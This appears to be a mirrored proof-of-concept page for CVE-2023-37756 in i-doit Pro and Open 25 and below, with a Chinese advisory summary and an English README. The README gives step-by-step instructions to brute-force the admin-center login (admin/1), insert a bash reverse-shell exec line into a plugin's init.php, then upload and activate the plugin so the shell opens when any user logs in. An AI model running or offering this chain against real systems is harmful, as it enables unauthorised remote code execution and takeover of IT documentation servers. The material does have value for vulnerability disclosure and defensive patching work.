关联漏洞
标题:
i-doit 安全漏洞
(CVE-2023-37756)
描述:i-doit是i-doit公司的一个配置管理数据库软件。 i-doit pro和i-doit open存在安全漏洞,该漏洞源于在创建管理员帐户时采用弱密码策略,导致攻击者可以通过暴力攻击猜测用户密码。受影响的产品和版本:i-doit Pro 25及之前版本,i-Doit Open25及之前版本。
介绍
# CVE-2023-37756 – Weak Password Requirement in admin-center lead to malicious plugin upload in the i-doit Pro 25 and below
i-doit Pro 25 and below are vulnerable to weak password requirement vulnerability in admin-center + malicious plugin upload lead to RCE vulnerability. These vulnerabilities could allows attacker to easily brute force or password guessed to gain access to admin-center and upload malicious plugin to gain remote code execution.
Description of product: i-doit is a web based Open Source IT documentation and CMDB (Configuration Management Database) developed by synetics GmbH. i-doit Pro is the commercial version of the software and requires a paid license. It comes with additional features, professional support, and regular updates and enhancements. Users need to purchase a license to use i-doit Pro, and the cost varies based on the number of users and features required.
Description of vulnerability: We found that this web application has weak password requirement in admin-center account creation, application owner can even set minimum 1 character password with default username “admin”. It could make attacker to easily brute force or password guessed to gain access to admin-center and upload malicious plugin to gain remote code execution.
Affected Webpage: admin-center login page + plugin install
Affected parameter & Component : admin-center login page + plugin install
Step 1 : as there are no password requirement or no password complexity implemented in account creation for admin-center, we can start from brute force.
Screenshot below shows we can login with username “admin” with password “1”
Step 2 : navigate to Add-on tab and choose upload
Step 3 : there are some requirement like package.json must exist and we found that the target has implemented async to check every classes and function . but we can download a proper plugin from their customer portal and edit / add in the init.php, this is the safest way to prevent system crash when trigger the payload.
Note: please put & at the end of the line to prevent system crash after payload triggered and init.php is the best place to inject payload
Example : exec ("/bin/bash -c 'bash -i >& /dev/tcp/IP/Port 0>&1 &'");
Note : remember to zip it back and upload
Note : click Install then activate the elected Add-on
Note: your payload will be triggered when someone login , it can be anyone.
文件快照
[4.0K] /data/pocs/bf152c221ebd7a0f4345a794d2d03aa6e0074c2c
└── [4.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。